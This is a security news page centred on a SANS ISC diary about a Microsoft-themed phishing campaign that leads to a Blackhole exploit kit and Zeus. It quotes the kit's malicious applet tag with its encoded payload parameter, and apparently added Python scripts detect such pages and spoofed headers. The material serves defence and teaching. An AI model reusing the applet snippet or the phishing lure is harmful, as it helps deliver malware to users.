InfoSec News

Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here, per a change to Microsoft services as of 27AUG.
The malicious version of this email instead carries a hyperlink that sends the victim to a Blackhole exploit kit landing page, which in turn delivers a fresh Zeus variant.
I'll walk you through the full sample set I analyzed. Susan sent us an email including the following header snippet:
Received: from [] ([]) by inbound94.exchangedefender.com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn.com ([]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
The originating host in the phishing sample is in China; smtpi.msn.com is Microsoft.
The legitimate email will include a hyperlink for http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK, which points to the above mentioned services agreement.
Obfuscated to protect the innocent: The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post.
Source code review of the web page served included the following applet tag:
<applet code=ndshesa.ndshesf archive=Leh.jar><param nam=123 name=uid value=N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:034:034:02:065:071:034></applet>
The VirusTotal link for Leh.jar is here, and the VirusTotal link for the Zeus variant offered is here.
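The applet tag above is the part of the landing page a detection rule can key on: a Java applet pulling a .jar archive and passing it a long colon-delimited numeric parameter (the encoded payload location). The following is an added example of mine, not code from the diary or from Websense, that pulls applet/param structures out of served HTML and flags that combination. The landing page HTML is constructed around the applet snippet quoted in the diary; the threshold of nine numeric fields and the benign comparison applet are assumptions for the demo.

```python
import re
from html.parser import HTMLParser

# Constructed landing page built around the applet tag quoted in the diary.
LANDING_HTML = """<html><body>
<applet code="ndshesa.ndshesf" archive="Leh.jar">
<param name="uid" value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:034:034:02:065:071:034">
</applet>
</body></html>"""

# Constructed benign applet for comparison: a jar, but no encoded blob.
BENIGN_HTML = """<html><body>
<applet code="Clock.class" archive="clock.jar"><param name="speed" value="fast"></applet>
</body></html>"""

# Optional single letter prefix (the sample starts with "N"), then at least
# nine colon-separated digit groups. Threshold is an assumption for the demo.
ENCODED_BLOB = re.compile(r'^[A-Za-z]?\d+(?::\d+){8,}$')


class AppletScanner(HTMLParser):
    """Collect every <applet> with its code/archive attributes and <param>s."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'applet':
            self._cur = {'code': a.get('code'), 'archive': a.get('archive'), 'params': {}}
            self.applets.append(self._cur)
        elif tag == 'param' and self._cur is not None:
            # <param> is a void element, so it only ever arrives as a start tag.
            self._cur['params'][a.get('name', '')] = a.get('value', '') or ''

    def handle_endtag(self, tag):
        if tag == 'applet':
            self._cur = None


def find_suspicious_applets(html):
    """Return applets that load a .jar and carry an encoded-blob parameter."""
    scanner = AppletScanner()
    scanner.feed(html)
    scanner.close()
    hits = []
    for ap in scanner.applets:
        loads_jar = (ap['archive'] or '').lower().endswith('.jar')
        encoded = [name for name, value in ap['params'].items() if ENCODED_BLOB.match(value)]
        if loads_jar and encoded:
            hits.append({'code': ap['code'], 'archive': ap['archive'], 'encoded_params': encoded})
    return hits


if __name__ == '__main__':
    for label, page in (('landing', LANDING_HTML), ('benign', BENIGN_HTML)):
        print(label, find_suspicious_applets(page))
```

Run against proxy logs or a web-filter's cached pages this gives a cheap first-pass filter; the archive name and applet class change between kit revisions, which is why the rule keys on the structure rather than on Leh.jar or ndshesa.ndshesf.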

Hover over hyperlinks and ensure they are directing you to legitimate sites before clicking. Be cautious even thereafter.
Contemplate disabling Java until the next update is released.
Review email headers if in doubt for messages you receive that seem suspicious.
Keep your antimalware signatures up to date. While limited at the moment, detection for both the Java exploit and the Zeus variant is increasing.
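Two of the recommendations above, reviewing headers and checking where links actually go, can be scripted. Here is an added example of mine, not code from the diary, that walks the Received: chain of a raw message to find the first relay that accepted it, pulls the hostnames out of the body's links, and compares both against what the genuine mailing looks like. The two messages are constructed to mirror the header snippets shown above: 198.51.100.23 and 203.0.113.9 are RFC 5737 documentation addresses standing in for the redacted IPs, the phishing link host keeps the diary's masked form, and the trusted relay and link-domain lists are assumptions for the demo.

```python
import email
import re
from email import policy
from urllib.parse import urlsplit

# Constructed sample shaped like the phishing header snippet above.
PHISH_RAW = """\
Received: from 198.51.100.23 ([198.51.100.23]) by inbound94.exchangedefender.com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
From: Microsoft <msa@communication.microsoft.com>
Subject: Important Changes to Microsoft Services Agreement and Communication Preferences

Review the changes: <a href="http://radiothat****.com/index.html">here</a>
"""

# Constructed sample shaped like the legitimate header snippet above.
LEGIT_RAW = """\
Received: from smtpi.msn.com ([203.0.113.9]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
From: Microsoft <msa@communication.microsoft.com>
Subject: Important Changes to Microsoft Services Agreement and Communication Preferences

Review the changes: <a href="http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK">here</a>
"""

# "from <host> (<info>) by <host>" as written by most MTAs.
_HOP = re.compile(r'from\s+(?P<frm>\S+)\s*(?:\((?P<info>[^)]*)\))?\s*by\s+(?P<by>\S+)', re.I)


def received_hops(raw):
    """Received: lines top-down: index 0 is the relay closest to us, the
    last entry is the first relay that accepted the message."""
    msg = email.message_from_string(raw, policy=policy.default)
    hops = []
    for hdr in msg.get_all('Received', []):
        m = _HOP.search(str(hdr))
        if m:
            hops.append({'from': m['frm'], 'info': m['info'] or '', 'by': m['by']})
    return hops


def originating_relay(raw):
    """Host named in the bottom-most Received: line, lower-cased."""
    hops = received_hops(raw)
    return hops[-1]['from'].lower() if hops else None


def link_hosts(raw):
    """Hostnames of every http(s) href in the body, which is what you would
    see by hovering over the links."""
    msg = email.message_from_string(raw, policy=policy.default)
    hosts = set()
    for url in re.findall(r'href=["\']?(https?://[^"\'\s>]+)', msg.get_payload(), re.I):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host)
    return hosts


def _under(host, domain):
    return host == domain or host.endswith('.' + domain)


def assess(raw, trusted_relays=('smtpi.msn.com',), trusted_link_domains=('microsoft.com',)):
    """Compare the message's origin and links with the genuine mailing.
    The trusted lists are demo assumptions; in production use SPF/DKIM."""
    origin = originating_relay(raw)
    findings = []
    if origin is None or not any(_under(origin, r) for r in trusted_relays):
        findings.append(f'first relay {origin} is not a known Microsoft relay')
    links = sorted(link_hosts(raw))
    for host in links:
        if not any(_under(host, d) for d in trusted_link_domains):
            findings.append(f'link host {host} is outside trusted domains')
    return {'origin': origin, 'links': links, 'findings': findings}


if __name__ == '__main__':
    for label, raw in (('phish', PHISH_RAW), ('legit', LEGIT_RAW)):
        print(label, assess(raw))
```

One caveat when applying this to real mail: only the Received: line added by your own MX (the top one) is something you observed; every line below it was written by whoever handed the message over and can be forged. The first-relay check above is therefore most reliable when the bottom-most hop is also the one your gateway recorded, and an SPF or DKIM result is the stronger signal.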

Ping us with questions or comments, as well as anything you'd like to share regarding similarly received emails from this phishing campaign.
Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
IBM and Oracle shared more details this week about new RISC chips they're building for server customers, the Power7+ in the case of IBM and the T5 for Oracle.
Facebook is tweaking its development platform to allow third-party applications to communicate directly with their users by sending notifications to their profiles.
Secure.me has launched a website and a browser plug-in designed to make Facebook users aware of the personal information that gets harvested by third-party applications.
unixODBC 'SQLDriverConnect()' 'FILEDSN' and 'DRIVER' Options Buffer Overflow Vulnerabilities
Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities
Rugged Operating System Private Key Disclosure Vulnerability
Mobile startup Ting, which delivers its voice, text and data offerings over Sprint Nextel's network, has become the newest LTE service provider by shipping its first device that uses the fast 4G technology.
Boehm GC malloc()' and 'calloc()' Multiple Buffer Overflow Vulnerabilities
Security advisory for Bugzilla 4.3.3, 4.2.3, 4.0.8 and 3.6.11
Polish security firm Security Explorations has sent an advisory, with a proof-of-concept exploit, to Oracle today (Friday 31 AUG) specific to a vulnerability they discovered in the Java 7 security update released Thursday. This newly reported vulnerability can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.

Stand by for more on this one; no word yet from Oracle regarding their remediation plans.
As Rapid7's Tod Beardsley has said: As it happens, very few websites rely on Java for dynamic content. Java isn't relied on nearly as much as Javascript and Flash. Most people can disable their Java browser plugin and not really notice the difference.
What mitigations are you utilizing to protect yourselves? Going so far as disabling Java all together? Feedback welcome via comments.
See Scott's post from yesterday for the original advisory details.
Russ McRee | @holisticinfosec

TYPO3 Core TYPO3-CORE-SA-2012-004 Multiple Remote Security Vulnerabilities
[SE-2012-01] New security issue affecting Java SE 7 Update 7
VMSA-2012-0013 VMware vSphere and vCOps updates to third party libraries
AST-2012-013: ACL rules ignored when placing outbound calls by certain IAX2 users
AST-2012-012: Asterisk Manager User Unauthorized Shell Access
Microsoft will allow users of Windows 8 Pro to downgrade their new PCs to Windows 7 or even Vista, according to the operating system's licensing agreement.
Security researchers from Poland-based security firm Security Explorations claim to have discovered a vulnerability in the Java 7 security update released Thursday that can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.
The enterprise software market on Thursday suddenly got an intimate look inside Workday, a red-hot startup that makes cloud applications for human resources and financials, with the public release of its S-1 IPO filing.
China's Huawei is previewing its new Android-based user interface, called Emotion UI, and has unveiled new devices at the IFA consumer electronics show in Berlin, including two new tablets that are arriving in select markets.
Samsung Electronics' Galaxy Camera, introduced at this week's IFA consumer electronics show in Berlin, takes clear, colorful images but is buggy and slow.
Using the slim evidence of new device identifiers, the developer of the popular Instapaper software yesterday speculated that Apple's long-rumored "iPad Mini" will include some of the same components as the low-priced iPad 2 tablet.
Dell and VMware have partnered to offer a rack-mountable pre-configured system to support VDI environments.
Agent Dash is a gesture-based action game that puts you in the well-polished shoes of an international spy. The object of the game from Full Fat is similar to side-scrolling platformer Robot Unicorn Attack--you need to prolong gameplay for as long as possible without hitting an obstacle. Death is inevitable and how long you're able to dodge rocks, pits, and death traps is a matter of skill and timing.
Samsung's newest iteration of the Galaxy Note smartphone-tablet hybrid has a large, bright screen, more powerful battery and a snappy processor. One of the few drawbacks found in using it at the IFA consumer electronics show in Berlin is that it might not fit in your pocket.
In the ongoing race to build ever better flat-screen displays, a potentially disruptive technology has made a small debut at IFA, the consumer electronics show currently taking place in Berlin.
Wireshark DRDA Dissector 'dissect_drda()' Denial of Service Vulnerability
Oracle Java SE CVE-2012-1721 Remote Java Runtime Environment Vulnerability
CSA will work with Fujitsu Laboratories of America on best practices, standards for securing big data.

As the Bring Your Own Device trend gains traction, Dell and EMC/Cisco are taking different approaches to desktop virtualization. Generally, Dell aims for PC users in the midmarket, while the EMC/Cisco partnership may work better for enterprises that have to consider the iPad. Both tacks are worth a look, though.
VMware released one new security advisory and updated two older ones.
New: VMSA-2012-0013 [1]
The update affects vCenter 4.1 (and Update Manager) without Update 3, as well as ESX/ESXi. It patches a number of open source components shipped as part of VMware products: Apache Struts, popt/rpm, glibc, libxml2, Perl, OpenSSL, the JRE and the Linux kernel.
An interesting item is the update of Java, which is included in ESX. Some of the older versions of ESX and vCenter still use Java 1.5, which was not affected by the recent issues. However, for those VMware products that do use Java 1.6, only Update 31 is provided. As of yesterday, Update 35 is current.
VMSA-2012-0005.2 [2]: Added Windows 7 information

VMSA-2012-0012.1 [3]: included information about vSphere 4.1 U3

[1] http://www.vmware.com/security/advisories/VMSA-2012-0013.html



Johannes B. Ullrich, Ph.D.

SANS Technology Institute

South Korea is about to upgrade its defensive and offensive measures in the cyber war against North Korean hackers. Among other things, the number of service personnel at the country's "Cyber Command" is to be doubled to 1,000.

Twitter will allow advertisers to target users based on their interests following a successful test of a new advertising feature, the company said on Thursday.
When the campaign is all-digital, who's in charge -- marketing or IT? Here are 4 ways to divide the work and keep the peace. Insider (registration required)
Google said it is shutting down its online marketplace for TV ads, and will focus instead on web advertising including its own Google TV, it said Thursday.
A $850 million deal between Taiwanese electronics giant Hon Hai Precision Industry and Japan's Sharp was still on hold Friday, as roller-coaster negotiations continued without the head of Hon Hai, who reportedly cut short his trip to Japan.
Retailer Walmart has rolled out a new search engine based on semantic search technology that helps users find items on its website and delivers results based on their interests and likely intent.
A test by heise Security demonstrates how important it is to install the Java update that has just been released. Most virus scanners don't offer reliable protection against web pages that exploit critical Java holes to manipulate a system without permission

Version 13.0.1 of Photoshop addresses a critical heap-based buffer overflow vulnerability in CS6 that could be exploited by an attacker to take control of an affected system

The company has released Java 7 Update 7 with fixes to block the vulnerabilities which allowed attackers to completely disable the Java security model

Posted by InfoSec News on Aug 31


By Kyle Murphy, PhD
EHR Intelligence
August 28, 2012

In a press release today, Cancer Care Group (Indianapolis, IN) announced
that a laptop computer containing its computer server backup media was
stolen from an employee's locked car on July 19, 2012. The breach has
potentially exposed the protected health information (PHI) or...

Posted by InfoSec News on Aug 31


By Dan Goodin
Ars Technica
Aug 30 2012

One of the world's biggest producers of liquefied natural gas has been
hit by a malware attack that has taken down its website and e-mail
servers. This is the second documented computer attack to hit a large
energy company this month.

Officials with Qatar-based RasGas first identified an "unknown...

Posted by InfoSec News on Aug 31


BBC News Asia
30 August 2012

A US man who worked as a guard at a US consulate in China has pleaded
guilty to trying to sell secret information to the Chinese government.

Bryan Underwood, 32, worked at the consulate in the southern city of
Guangzhou between 2009 and 2011.

He was accused of writing to China's ministry of state security,
offering to provide photographs and details of security...

Posted by InfoSec News on Aug 31


By Mathew J. Schwartz
August 30, 2012

Beware of a "major flaw" in the UPEK Protector Suite software that's
been preinstalled on many laptops with built-in UPEK fingerprint

That warning comes from ElcomSoft, a Russian provider of
encryption-cracking software.

"After analyzing a number of...

Posted by InfoSec News on Aug 31


By Jaikumar Vijayan
August 30, 2012

A senior Democratic lawmaker is urging President Barack Obama to issue
an executive order aimed at protecting the nation's critical
infrastructure against cyber threats.

In an open letter to the President on Tuesday, Sen. Dianne Feinstein
(D-Calif.) called on Obama to use...
Google has released an update to the 21.x branch of its Chrome browser, closing a total of nine security holes including three high-severity problems

A Tokyo court ruled Friday that Samsung did not infringe an Apple patent in a locally filed lawsuit, a minor victory for Samsung in the ongoing legal battles between the two companies.